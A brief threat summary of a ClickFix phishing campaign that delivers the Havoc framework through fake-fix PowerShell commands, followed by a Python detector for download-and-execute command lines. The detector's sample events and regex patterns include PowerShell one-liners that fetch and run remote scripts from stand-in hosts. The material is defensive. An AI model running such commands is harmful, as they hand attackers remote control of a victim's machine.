Summary: A newly discovered ClickFix phishing campaign deceives victims into executing malicious PowerShell commands that install the Havoc post-exploitation framework, providing remote access to compromised devices. It employs social-engineering tactics, leading users to believe they must “fix” a nonexistent error by running harmful scripts from a remote server. This method allows attackers to blend malicious activities with legitimate cloud communications, making detection difficult.
Affected: Organizations using Microsoft cloud services
Key points:
- Threat actors use fake error messages to entice users into downloading malicious PowerShell commands.
- The Havoc framework, once installed, enables remote access and control over compromised devices.
- The campaign is evolving, with similar techniques used on social media platforms to trick users into executing harmful scripts.
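
Because the activity blends with legitimate cloud communications, destination reputation alone will not flag it. The following Python is an added example, not part of the original report: it triages process command lines on behaviour (a PowerShell download primitive combined with in-memory execution) and records whether a domain allow-list would have let the event through. The trusted suffix, sample command lines and function names are constructed assumptions.

```python
import re

# Assumption: host suffixes an organisation treats as trusted cloud (hypothetical value).
TRUSTED_SUFFIXES = (".trusted-cloud.example",)

# Real PowerShell cmdlets/aliases/methods that fetch remote content.
DOWNLOAD = re.compile(
    r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|curl|wget)\b", re.I)
# Real cmdlet/alias that executes a string as code in memory.
EXECUTE = re.compile(r"\b(invoke-expression|iex)\b", re.I)
SHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s'\"|)]+)", re.I)


def classify(command_line):
    """Return a finding for a download-and-execute PowerShell line, else None."""
    if not SHELL.search(command_line):
        return None
    if not (DOWNLOAD.search(command_line) and EXECUTE.search(command_line)):
        return None
    hosts = [h.lower() for h in URL_HOST.findall(command_line)]
    trusted = bool(hosts) and all(h.endswith(TRUSTED_SUFFIXES) for h in hosts)
    # A trusted destination does not clear the event: the behaviour is the signal.
    return {"hosts": hosts, "would_pass_domain_allowlist": trusted, "severity": "high"}


def triage(events):
    """Return (command_line, finding) pairs for every flagged event."""
    return [(e, f) for e in events if (f := classify(e))]


# Constructed sample process-creation command lines (not taken from the campaign).
SAMPLE_EVENTS = [
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Reports"',
    'powershell.exe -w hidden -c "iwr https://files.trusted-cloud.example/fix.ps1 | iex"',
    'pwsh -c "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.7/a.ps1\')"',
    'powershell.exe -c "Invoke-WebRequest https://updates.trusted-cloud.example/t.msi -OutFile t.msi"',
]

if __name__ == "__main__":
    for line, finding in triage(SAMPLE_EVENTS):
        print(finding["severity"], finding["would_pass_domain_allowlist"], line)
```

The second sample is the case the summary warns about: it is flagged on behaviour even though its only destination would pass a domain allow-list.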